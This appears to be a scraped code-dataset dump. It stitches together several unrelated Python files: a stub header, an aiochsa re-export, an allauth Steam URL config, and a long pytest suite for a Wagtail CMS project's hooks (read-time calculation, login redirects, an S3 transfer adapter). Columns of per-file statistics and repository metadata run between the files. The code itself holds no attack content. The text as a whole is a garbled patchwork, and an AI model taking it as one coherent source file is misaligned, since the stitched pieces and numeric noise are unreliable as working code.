"""
Created on Fri Dec 27 12:19:49 2019
@author: thisisbex
"""
| 13.428571
| 36
| 0.553191
| 14
| 94
| 3.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183099
| 0.244681
| 94
| 6
| 37
| 15.666667
| 0.549296
| 0.829787
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
feb89729f9b331ba7cd278372a7a3f30c55a2f37
| 63
|
py
|
Python
|
aiochsa/sql.py
|
ods/aiochsa
|
471f72b70e5e6b62968ef401e402c23d8c0f28b5
|
[
"MIT"
] | 17
|
2019-08-20T08:40:57.000Z
|
2022-01-02T04:00:28.000Z
|
aiochsa/sql.py
|
chinchy/aiochsa
|
471f72b70e5e6b62968ef401e402c23d8c0f28b5
|
[
"MIT"
] | 10
|
2020-08-04T16:02:21.000Z
|
2022-01-02T11:40:00.000Z
|
aiochsa/sql.py
|
chinchy/aiochsa
|
471f72b70e5e6b62968ef401e402c23d8c0f28b5
|
[
"MIT"
] | 2
|
2021-04-18T15:37:07.000Z
|
2021-12-13T11:42:00.000Z
|
from clickhouse_sqlalchemy.sql import Select
select = Select
| 12.6
| 44
| 0.825397
| 8
| 63
| 6.375
| 0.75
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 63
| 4
| 45
| 15.75
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
228eec461b505a590bfec4b7b50c5ce810c3614b
| 215
|
py
|
Python
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/steam/urls.py
|
vikram0207/django-rest
|
eafec575999dce6859dc7b99177cff339b2bcbdd
|
[
"MIT"
] | 12
|
2019-08-02T07:58:16.000Z
|
2022-01-31T23:45:08.000Z
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/steam/urls.py
|
vikram0207/django-rest
|
eafec575999dce6859dc7b99177cff339b2bcbdd
|
[
"MIT"
] | 12
|
2019-12-04T23:48:45.000Z
|
2022-03-11T23:53:30.000Z
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/steam/urls.py
|
vikram0207/django-rest
|
eafec575999dce6859dc7b99177cff339b2bcbdd
|
[
"MIT"
] | 11
|
2019-07-31T16:23:36.000Z
|
2022-01-29T08:30:07.000Z
|
from django.conf.urls import url
from . import views
urlpatterns = [
url("^steam/login/$", views.steam_login, name="steam_login"),
url("^steam/callback/$", views.steam_callback, name="steam_callback"),
]
| 21.5
| 74
| 0.697674
| 28
| 215
| 5.214286
| 0.428571
| 0.205479
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134884
| 215
| 9
| 75
| 23.888889
| 0.784946
| 0
| 0
| 0
| 0
| 0
| 0.260465
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
a3c08be61fb750ca0dbb0723d8732578bab4842b
| 36,297
|
py
|
Python
|
tests/unit/core/test_wagtail_hooks.py
|
uktrade/great-cms
|
f13fa335ddcb925bc33a5fa096fe73ef7bdd351a
|
[
"MIT"
] | 10
|
2020-04-30T12:04:35.000Z
|
2021-07-21T12:48:55.000Z
|
tests/unit/core/test_wagtail_hooks.py
|
uktrade/great-cms
|
f13fa335ddcb925bc33a5fa096fe73ef7bdd351a
|
[
"MIT"
] | 1,461
|
2020-01-23T18:20:26.000Z
|
2022-03-31T08:05:56.000Z
|
tests/unit/core/test_wagtail_hooks.py
|
uktrade/great-cms
|
f13fa335ddcb925bc33a5fa096fe73ef7bdd351a
|
[
"MIT"
] | 3
|
2020-04-07T20:11:36.000Z
|
2020-10-16T16:22:59.000Z
|
import json
from datetime import timedelta
from unittest import mock
import pytest
from boto3.exceptions import RetriesExceededError, S3UploadFailedError
from django.contrib.auth.models import AnonymousUser
from django.contrib.sessions.middleware import SessionMiddleware
from django.db.models import FileField
from django.test import override_settings
from wagtail.core.rich_text import RichText
from core import cms_slugs, wagtail_hooks
from core.models import DetailPage
from core.wagtail_hooks import (
FileTransferError,
S3FileFieldAdapter,
S3WagtailTransferFile,
editor_css,
register_s3_media_file_adapter,
)
from tests.helpers import make_test_video
from tests.unit.core import factories
from tests.unit.learn.factories import LessonPageFactory
LOREM_IPSUM = (
'Lorem ipsum dolor sit amet, consectetur adipiscing elit. '
'Verum hoc loco sumo verbis his eandem certe vim voluptatis '
'Epicurum nosse quam ceteros. Consequentia exquirere, quoad sit '
'id, quod volumus, effectum. Et quidem saepe quaerimus verbum '
'Latinum par Graeco et quod idem valeat; Quam illa ardentis '
'amores excitaret sui! Cur tandem? Nihil est enim, de quo aliter '
'tu sentias atque ego, modo commutatis verbis ipsas res conferamus. '
)
@pytest.mark.django_db
def test_anonymous_user_required_handles_anonymous_users(rf, domestic_homepage):
request = rf.get('/')
request.user = AnonymousUser()
response = wagtail_hooks.anonymous_user_required(
page=domestic_homepage,
request=request,
serve_args=[],
serve_kwargs={},
)
assert response is None
@pytest.mark.django_db
def test_anonymous_user_required_handles_authenticated_users(rf, domestic_homepage, user):
request = rf.get('/')
request.user = user
middleware = SessionMiddleware()
middleware.process_request(request)
request.session.save()
response = wagtail_hooks.anonymous_user_required(
page=domestic_homepage,
request=request,
serve_args=[],
serve_kwargs={},
)
assert response.status_code == 302
assert response.url == domestic_homepage.anonymous_user_required_redirect_url
@pytest.mark.django_db
def test_login_required_signup_wizard_ignores_irrelevant_pages(rf, domestic_homepage):
request = rf.get('/')
request.user = AnonymousUser()
response = wagtail_hooks.login_required_signup_wizard(
page=domestic_homepage,
request=request,
serve_args=[],
serve_kwargs={},
)
assert response is None
@pytest.mark.django_db
def test_login_required_signup_wizard_handles_anonymous_users(rf, domestic_homepage):
page = LessonPageFactory(parent=domestic_homepage)
request = rf.get('/foo/bar/')
request.user = AnonymousUser()
middleware = SessionMiddleware()
middleware.process_request(request)
request.session.save()
response = wagtail_hooks.login_required_signup_wizard(
page=page,
request=request,
serve_args=[],
serve_kwargs={},
)
assert response.status_code == 302
assert response.url == '/signup/tailored-content/start/?next=/foo/bar/'
@pytest.mark.django_db
def test_login_required_signup_wizard_handles_anonymous_users_opting_out(rf, domestic_homepage, user):
page = LessonPageFactory(parent=domestic_homepage)
first_request = rf.get('/foo/bar/', {'show-generic-content': True})
first_request.user = AnonymousUser()
middleware = SessionMiddleware()
middleware.process_request(first_request)
first_request.session.save()
response = wagtail_hooks.login_required_signup_wizard(
page=page,
request=first_request,
serve_args=[],
serve_kwargs={},
)
assert response is None
second_request = rf.get('/foo/bar/')
second_request.user = user
second_request.session = first_request.session
response = wagtail_hooks.login_required_signup_wizard(
page=page,
request=second_request,
serve_args=[],
serve_kwargs={},
)
assert response is None
@pytest.mark.django_db
def test_login_required_signup_wizard_handles_authenticated_users(rf, user, domestic_homepage):
page = LessonPageFactory(parent=domestic_homepage)
request = rf.get('/')
request.user = user
response = wagtail_hooks.login_required_signup_wizard(
page=page,
request=request,
serve_args=[],
serve_kwargs={},
)
assert response is None
@pytest.mark.django_db
def test_estimated_read_time_calculation(rf, domestic_homepage):
# IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
# your changeset has slightly increased the size of the HTML page, which
# may have slightly pushed up the default/empty-page readtime (either in
# real terms or just in terms of elements that affect the calculation). If
# so, pushing up the expected time variables in the test is OK to do.
request = rf.get('/')
request.user = AnonymousUser()
reading_content = f'<p>{ LOREM_IPSUM * 10}</p>'
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
hero=[],
body=[],
objective=[('paragraph', RichText(reading_content))],
)
# Every real-world page will have a revision, so the test needs one, too
revision = detail_page.save_revision()
revision.publish()
expected_duration = timedelta(seconds=152)
detail_page.refresh_from_db()
assert detail_page.estimated_read_duration != expected_duration
wagtail_hooks._set_read_time(page=detail_page, request=request)
detail_page.refresh_from_db()
assert detail_page.estimated_read_duration == expected_duration
@pytest.mark.django_db
def test_estimated_read_time_calculation__checks_text_and_video(rf, domestic_homepage):
# IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
# your changeset has slightly increased the size of the HTML page, which
# may have slightly pushed up the default/empty-page readtime (either in
# real terms or just in terms of elements that affect the calculation). If
# so, pushing up the expected time variables in the test is OK to do.
request = rf.get('/')
request.user = AnonymousUser()
video_for_hero = make_test_video(duration=123)
video_for_hero.save()
reading_content = f'<p>{ LOREM_IPSUM * 10}</p>'
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
hero=[
('Video', factories.SimpleVideoBlockFactory(video=video_for_hero)),
],
objective=[('paragraph', RichText(reading_content))],
body=[], # if needed StreamField rich-text and video content can be added
)
# Every real-world page will have a revision, so the test needs one, too
revision = detail_page.save_revision()
revision.publish()
expected_duration = timedelta(seconds=153 + 123) # reading + watching
detail_page.refresh_from_db()
assert detail_page.estimated_read_duration != expected_duration
wagtail_hooks._set_read_time(page=detail_page, request=request)
detail_page.refresh_from_db()
assert detail_page.estimated_read_duration == expected_duration
@pytest.mark.django_db
def test_estimated_read_time_calculation__checks_video(rf, domestic_homepage):
# IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
# your changeset has slightly increased the size of the HTML page, which
# may have slightly pushed up the default/empty-page readtime (either in
# real terms or just in terms of elements that affect the calculation). If
# so, pushing up the expected time variables in the test is OK to do.
request = rf.get('/')
request.user = AnonymousUser()
video_for_hero = make_test_video(duration=123)
video_for_hero.save()
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
hero=[
('Video', factories.SimpleVideoBlockFactory(video=video_for_hero)),
],
objective=[],
body=[], # if needed StreamField rich-text and video content can be added
)
# Every real-world page will have a revision, so the test needs one, too
revision = detail_page.save_revision()
revision.publish()
expected_duration = timedelta(seconds=4 + 123) # reading + watching
detail_page.refresh_from_db()
assert detail_page.estimated_read_duration != expected_duration
wagtail_hooks._set_read_time(page=detail_page, request=request)
detail_page.refresh_from_db()
assert detail_page.estimated_read_duration == expected_duration
@pytest.mark.django_db
def test_estimated_read_time_calculation__updates_only_draft_if_appropriate(rf, domestic_homepage):
# IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
# your changeset has slightly increased the size of the HTML page, which
# may have slightly pushed up the default/empty-page readtime (either in
# real terms or just in terms of elements that affect the calculation). If
# so, pushing up the expected time variables in the test is OK to do.
request = rf.get('/')
request.user = AnonymousUser()
video_for_hero = make_test_video(duration=124)
video_for_hero.save()
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
body=[],
)
assert detail_page.live is True
original_live_read_duration = detail_page.estimated_read_duration
assert original_live_read_duration is None
# Note: for test simplicity here, we're not adding streamfield content to our
# revision - it is enough to just notice how the readtimes for Draft vs Live
# are appropriate updated at the expected times, based on the minimal default
# content of a DetailPage.
revision = detail_page.save_revision()
assert json.loads(revision.content_json)['estimated_read_duration'] == original_live_read_duration
detail_page.refresh_from_db()
wagtail_hooks._set_read_time(page=detail_page, request=request)
detail_page.refresh_from_db()
expected_duration = timedelta(seconds=2) # NB just the read time of a skeleton DetailPage
# show the live version is not updated yet
assert detail_page.has_unpublished_changes is True
assert detail_page.estimated_read_duration != expected_duration
assert detail_page.estimated_read_duration == original_live_read_duration
# but the draft is
latest_rev = detail_page.get_latest_revision()
assert revision == latest_rev
assert json.loads(latest_rev.content_json)['estimated_read_duration'] == str(expected_duration)
# Now publish the draft and show it updates the live, too
latest_rev.publish()
detail_page.refresh_from_db()
wagtail_hooks._set_read_time(page=detail_page, request=request)
detail_page.refresh_from_db()
assert detail_page.estimated_read_duration != original_live_read_duration
# NOTE: for a reason unrelated to the point of _this_ test, the readtime
# of the published page CAN BE calculated as slightly longer than the draft.
# This may be in part due to the page having a very small amount of content.
assert detail_page.estimated_read_duration == timedelta(seconds=3)
@pytest.mark.django_db
def test_estimated_read_time_calculation__forced_update_of_live(rf, domestic_homepage):
# This test is a variant of test_estimated_read_time_calculation__updates_only_draft_if_appropriate
# IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
# your changeset has slightly increased the size of the HTML page, which
# may have slightly pushed up the default/empty-page readtime (either in
# real terms or just in terms of elements that affect the calculation). If
# so, pushing up the expected time variables in the test is OK to do.
request = rf.get('/')
request.user = AnonymousUser()
video_for_hero = make_test_video(duration=124)
video_for_hero.save()
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
body=[],
)
assert detail_page.live is True
original_live_read_duration = detail_page.estimated_read_duration
assert original_live_read_duration is None
# Make a revision, so we have both draft and live in existence
revision = detail_page.save_revision()
assert json.loads(revision.content_json)['estimated_read_duration'] == original_live_read_duration
detail_page.refresh_from_db()
wagtail_hooks._set_read_time(
page=detail_page,
request=request,
is_post_creation=True, # THIS will mean the live page is updated at the same time as the draft
)
detail_page.refresh_from_db()
expected_duration = timedelta(seconds=2) # NB just the read time of a skeleton DetailPage
# show the live version is updated yet
assert detail_page.estimated_read_duration == expected_duration
assert detail_page.has_unpublished_changes is True
# and the draft is updated too
latest_rev = detail_page.get_latest_revision()
assert revision == latest_rev
assert json.loads(latest_rev.content_json)['estimated_read_duration'] == str(expected_duration)
@pytest.mark.parametrize('is_post_creation_val', (True, False))
@pytest.mark.django_db
def test__set_read_time__passes_through_is_post_creation(
rf,
domestic_homepage,
is_post_creation_val,
):
request = rf.get('/')
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
body=[],
)
with mock.patch(
'core.wagtail_hooks._update_data_for_appropriate_version'
) as mocked_update_data_for_appropriate_version:
wagtail_hooks._set_read_time(request, detail_page, is_post_creation=is_post_creation_val)
expected_seconds = 2
mocked_update_data_for_appropriate_version.assert_called_once_with(
page=detail_page,
force_page_update=is_post_creation_val,
data_to_update={'estimated_read_duration': timedelta(seconds=expected_seconds)},
)
@pytest.mark.django_db
@pytest.mark.parametrize('force_update', (False, True))
def test__update_data_for_appropriate_version(domestic_homepage, rf, force_update):
request = rf.get('/')
request.user = AnonymousUser()
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
body=[],
)
assert detail_page.live is True
# Make a revision, so we have both draft and live in existence
revision = detail_page.save_revision()
assert detail_page.get_latest_revision() == revision
assert detail_page.title != 'Dummy Title'
assert json.loads(revision.content_json)['title'] == detail_page.title
wagtail_hooks._update_data_for_appropriate_version(
page=detail_page, force_page_update=force_update, data_to_update={'title': 'Dummy Title'}
)
revision.refresh_from_db()
assert json.loads(revision.content_json)['title'] == 'Dummy Title'
detail_page.refresh_from_db()
if force_update:
assert detail_page.title == 'Dummy Title'
else:
assert detail_page.title != 'Dummy Title'
@pytest.mark.django_db
def test_set_read_time__after_create_page(domestic_homepage, rf):
request = rf.get('/')
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
body=[],
)
with mock.patch('core.wagtail_hooks._set_read_time') as mock__set_read_time:
wagtail_hooks.set_read_time__after_create_page(request, detail_page)
mock__set_read_time.assert_called_once_with(request, detail_page, is_post_creation=True)
@pytest.mark.django_db
def test_set_read_time__after_edit_page(domestic_homepage, rf):
request = rf.get('/')
detail_page = factories.DetailPageFactory(
parent=domestic_homepage,
template='learn/detail_page.html',
body=[],
)
with mock.patch('core.wagtail_hooks._set_read_time') as mock__set_read_time:
wagtail_hooks.set_read_time__after_edit_page(request, detail_page)
mock__set_read_time.assert_called_once_with(request, detail_page)
def test_wagtail_transfer_custom_adapter_methods___get_relevant_s3_meta():
mock_field = mock.Mock(name='mock_field')
adapter = S3FileFieldAdapter(mock_field)
mock_field_value = mock.Mock(name='mock_field_value')
mock_field_value.storage.bucket.name = 'test-bucket-name'
mock_field_value.name = 'test-bucket-key'
# There are other attributes on the real object, eg 'url'
mock_objectsummary_instance = mock.Mock(name='mock_objectsummary_instance')
mock_objectsummary_instance.size = 1234567
mock_objectsummary_instance.e_tag.replace.return_value = 'aabbccddeeff112233445566'
# The double quoting is correct - ETags are meant to be double-quoted.
# See https://tools.ietf.org/html/rfc2616#section-14.19
mock_objectsummary_class = mock.Mock(name='mock ObjectSummary')
mock_objectsummary_class.return_value = mock_objectsummary_instance
with mock.patch('core.wagtail_hooks.s3.ObjectSummary', mock_objectsummary_class):
meta = adapter._get_relevant_s3_meta(mock_field_value)
mock_objectsummary_class.assert_called_once_with('test-bucket-name', 'test-bucket-key')
assert meta == {'size': 1234567, 'hash': 'aabbccddeeff112233445566'}
@pytest.mark.parametrize(
'etag_val,expected',
(
('"aabbccddeeff112233445566"', 'aabbccddeeff112233445566'),
('aabbccddeeff112233445566', 'aabbccddeeff112233445566'),
("aabbccddeeff112233445566", 'aabbccddeeff112233445566'), # noqa Q000 - this was deliberate
),
)
def test_wagtail_transfer_custom_adapter_methods___get_file_hash(etag_val, expected):
mock_field = mock.Mock(name='mock_field')
adapter = S3FileFieldAdapter(mock_field)
mock_objectsummary_instance = mock.Mock(name='mock_objectsummary_instance')
mock_objectsummary_instance.size = 1234567
mock_objectsummary_instance.e_tag = etag_val
hash_ = adapter._get_file_hash(mock_objectsummary_instance)
assert hash_ == expected
@pytest.mark.parametrize(
'file_url,expected',
(
# See constants.AWS_S3_MAIN_HOSTNAME_OPTIONS
(
'https://w-t-test-bucket.s3.amazonaws.com/media/path/to/file.mp4',
('w-t-test-bucket', 'media/path/to/file.mp4'),
),
(
'http://w-t-test-bucket.s3.amazonaws.com/media/path/to/file.mp4',
('w-t-test-bucket', 'media/path/to/file.mp4'),
),
(
'https://w-t-test-bucket.s3.eu-west-2.amazonaws.com/media/path/to/file.mp4',
('w-t-test-bucket', 'media/path/to/file.mp4'),
),
(
'https://w-t-test-bucket.s3.dualstack.eu-west-2.amazonaws.com/media/path/to/file.mp4',
('w-t-test-bucket', 'media/path/to/file.mp4'),
),
(
'https://w-t-test-bucket.s3-accesspoint.eu-west-2.amazonaws.com/media/path/to/file.mp4',
('w-t-test-bucket', 'media/path/to/file.mp4'),
),
(
'https://w-t-test-bucket.s3-accesspoint.dualstack.eu-west-2.amazonaws.com/media/path/to/file.mp4',
('w-t-test-bucket', 'media/path/to/file.mp4'),
),
),
)
def test_wagtail_transfer_custom_adapter_methods___get_imported_file_bucket_and_key(file_url, expected):
mock_field = mock.Mock(name='mock_field')
adapter = S3FileFieldAdapter(mock_field)
assert adapter._get_imported_file_bucket_and_key(file_url) == expected
@override_settings(MEDIA_URL='https://magna-fake-example.s3.amazonaws.com')
@pytest.mark.parametrize(
'url,expected',
(
(
'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
{
'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
'size': 123321,
'hash': 'aabbccddeeff665544332211',
},
),
(None, None),
),
)
def test_wagtail_transfer_custom_adapter_methods__serialize(url, expected):
file_field = FileField()
if url:
mock_field_value = mock.Mock()
mock_field_value.url = url
# There are other attributes on the real object, but we're only using url here
else:
mock_field_value = None
file_field.value_from_object = mock.Mock(return_value=mock_field_value)
adapter = S3FileFieldAdapter(file_field)
instance = mock.Mock()
mock_get_relevant_s3_meta = mock.Mock(
return_value={'download_url': url, 'size': 123321, 'hash': 'aabbccddeeff665544332211'}
)
with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
output = adapter.serialize(instance)
assert output == expected
file_field.value_from_object.assert_called_once_with(instance)
if url:
mock_get_relevant_s3_meta.assert_called_once_with(field_value=mock_field_value)
####################################################################################################
# Cases for S3FileFieldAdapter.populate_field
# These following tests are repetitive, but using parametrize() to DRY them up just
# made them really complex
# 1. File not already imported, source's hash matches hashes with existing file, so no import needed
# 2. File not already imported, source's hash doesn't match existing file, so we do a fresh import
# 3. As above, but an exception is raised during file.transfer()
# 4. File was already imported - no need to re-import
# 5. Null `value` param, we abandon early
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_1():
# 1. File not already imported, source's hash matches hashes with existing file, so no import needed
file_field = FileField()
file_field.get_attname = mock.Mock(return_value='some-filefield')
mock_field_value = mock.Mock(name='mock_field_value')
mock_field_value.storage.bucket.name = 'test-bucket-name'
mock_field_value.name = 'test-bucket-key'
file_field.value_from_object = mock.Mock(return_value=mock_field_value)
adapter = S3FileFieldAdapter(file_field)
fake_value = {
'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
'size': 123321,
'hash': 'aabbccddeeff665544332211',
}
adapter._get_imported_file_bucket_and_key = mock.Mock(
return_value=('magna-fake-example.s3.amazonaws.com', 'path/to/file.jpg')
)
mock_context = mock.Mock()
mock_context.imported_files_by_source_url = {}
mock_imported_file = mock.Mock(name='mock_imported_file')
mock_get_relevant_s3_meta = mock.Mock(
return_value={
'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
'size': 123321,
'hash': 'aabbccddeeff665544332211', # same as existing file, so no import will happen
}
)
mock_s3_file = mock.Mock(name='mock_s3_file')
mock_s3_file.source_url = 'MOCK_SOURCE_URL_VALUE'
mock_s3_file.transfer.return_value = mock_imported_file
mock_S3WagtailTransferFile = mock.Mock(return_value=mock_s3_file) # noqa N806
mock_instance = mock.Mock()
with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
adapter.populate_field(
instance=mock_instance,
value=fake_value,
context=mock_context,
)
assert adapter._get_imported_file_bucket_and_key.call_count == 0
mock_get_relevant_s3_meta.assert_called_once_with(field_value=mock_field_value)
assert mock_S3WagtailTransferFile.call_count == 0
assert mock_s3_file.transfer.call_count == 0
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_2():
# 2. File not already imported, source's hash DOES NOT match existing file, so we do a fresh import
file_field = FileField()
file_field.get_attname = mock.Mock(return_value='some-filefield')
mock_field_value = mock.Mock(name='mock_field_value')
mock_field_value.storage.bucket.name = 'test-bucket-name'
mock_field_value.name = 'test-bucket-key'
file_field.value_from_object = mock.Mock(return_value=mock_field_value)
mock_instance = mock.Mock()
adapter = S3FileFieldAdapter(file_field)
fake_value = {
'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
'size': 123321,
'hash': 'aabbccddeeff665544332211',
}
adapter._get_imported_file_bucket_and_key = mock.Mock(
return_value=('magna-fake-example.s3.amazonaws.com', 'path/to/file.jpg')
)
mock_context = mock.Mock()
mock_context.imported_files_by_source_url = {}
mock_imported_file = mock.Mock(name='mock_imported_file')
mock_get_relevant_s3_meta = mock.Mock(
return_value={
'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
'size': 123321,
'hash': 'bbccddeeff', # ie, does NOT match
}
)
mock_s3_file = mock.Mock(name='mock_s3_file')
mock_s3_file.source_url = 'MOCK_SOURCE_URL_VALUE'
mock_s3_file.transfer.return_value = mock_imported_file
mock_S3WagtailTransferFile = mock.Mock(return_value=mock_s3_file) # noqa N806
with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
adapter.populate_field(
instance=mock_instance,
value=fake_value,
context=mock_context,
)
# the importer was called
mock_get_relevant_s3_meta.assert_called_once_with(field_value=mock_field_value)
adapter._get_imported_file_bucket_and_key.assert_called_once_with(fake_value['download_url'])
mock_S3WagtailTransferFile.assert_called_once_with(
local_filename='path/to/file.jpg', # not changed by DefaultStorage in this test
size=123321,
hash_='aabbccddeeff665544332211',
source_url='https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
source_bucket='magna-fake-example.s3.amazonaws.com',
source_key='path/to/file.jpg',
)
mock_s3_file.transfer.assert_called_once_with() # Deliberately no args
# show the imported file is now in the cache so it won't be re-imported
assert mock_context.imported_files_by_source_url['MOCK_SOURCE_URL_VALUE'] == mock_imported_file
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_3():
# 3. As above, but an exception is raised during file.transfer()
file_field = FileField()
file_field.get_attname = mock.Mock(return_value='some-filefield')
mock_field_value = mock.Mock(name='mock_field_value')
mock_field_value.storage.bucket.name = 'test-bucket-name'
mock_field_value.name = 'test-bucket-key'
file_field.value_from_object = mock.Mock(return_value=mock_field_value)
mock_instance = mock.Mock()
adapter = S3FileFieldAdapter(file_field)
fake_value = {
'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
'size': 123321,
'hash': 'aabbccddeeff665544332211',
}
adapter._get_imported_file_bucket_and_key = mock.Mock(
return_value=('magna-fake-example.s3.amazonaws.com', 'path/to/file.jpg')
)
mock_context = mock.Mock()
mock_context.imported_files_by_source_url = {}
mock_get_relevant_s3_meta = mock.Mock(
return_value={
'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
'size': 123321,
'hash': 'bbccddeeff', # ie, does NOT match
}
)
mock_s3_file = mock.Mock(name='mock_s3_file')
mock_s3_file.source_url = 'MOCK_SOURCE_URL_VALUE'
mock_s3_file.transfer.side_effect = FileTransferError('Faked')
mock_S3WagtailTransferFile = mock.Mock(return_value=mock_s3_file) # noqa N806
with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
adapter.populate_field(
instance=mock_instance,
value=fake_value,
context=mock_context,
)
# the importer was called, but dudn't succeed
mock_get_relevant_s3_meta.assert_called_once_with(field_value=mock_field_value)
adapter._get_imported_file_bucket_and_key.assert_called_once_with(fake_value['download_url'])
mock_S3WagtailTransferFile.assert_called_once_with(
local_filename='path/to/file.jpg', # not changed by DefaultStorage in this test
size=123321,
hash_='aabbccddeeff665544332211',
source_url='https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
source_bucket='magna-fake-example.s3.amazonaws.com',
source_key='path/to/file.jpg',
)
mock_s3_file.transfer.assert_called_once_with() # Deliberately no args
# show the imported file is NOT in the cache because we failde
assert 'MOCK_SOURCE_URL_VALUE' not in mock_context.imported_files_by_source_url
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_4():
# 4. File was already imported - no need to re-import
file_field = FileField()
file_field.get_attname = mock.Mock(return_value='some-filefield')
mock_field_value = mock.Mock(name='mock_field_value')
mock_field_value.storage.bucket.name = 'test-bucket-name'
mock_field_value.name = 'test-bucket-key'
file_field.value_from_object = mock.Mock(return_value=mock_field_value)
mock_instance = mock.Mock()
adapter = S3FileFieldAdapter(file_field)
fake_value = {
'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
'size': 123321,
'hash': 'aabbccddeeff665544332211',
}
adapter._get_imported_file_bucket_and_key = mock.Mock()
mock_imported_file = mock.Mock(name='mock_imported_file')
mock_context = mock.Mock()
mock_context.imported_files_by_source_url = {
'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg': mock_imported_file
}
mock_get_relevant_s3_meta = mock.Mock()
mock_S3WagtailTransferFile = mock.Mock() # noqa N806
with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
adapter.populate_field(
instance=mock_instance,
value=fake_value,
context=mock_context,
)
assert adapter._get_imported_file_bucket_and_key.call_count == 0
assert mock_get_relevant_s3_meta.call_count == 0
assert mock_S3WagtailTransferFile.call_count == 0
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_5():
# 5. Null `value` param, we abandon early
file_field = FileField()
file_field.get_attname = mock.Mock(return_value='some-filefield')
file_field.value_from_object = mock.Mock()
mock_instance = mock.Mock()
adapter = S3FileFieldAdapter(file_field)
fake_value = {}
adapter._get_imported_file_bucket_and_key = mock.Mock()
mock_context = mock.Mock()
mock_get_relevant_s3_meta = mock.Mock()
mock_S3WagtailTransferFile = mock.Mock() # noqa N806
with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
adapter.populate_field(
instance=mock_instance,
value=fake_value,
context=mock_context,
)
assert file_field.value_from_object.call_count == 0
assert adapter._get_imported_file_bucket_and_key.call_count == 0
assert mock_get_relevant_s3_meta.call_count == 0
assert mock_S3WagtailTransferFile.call_count == 0
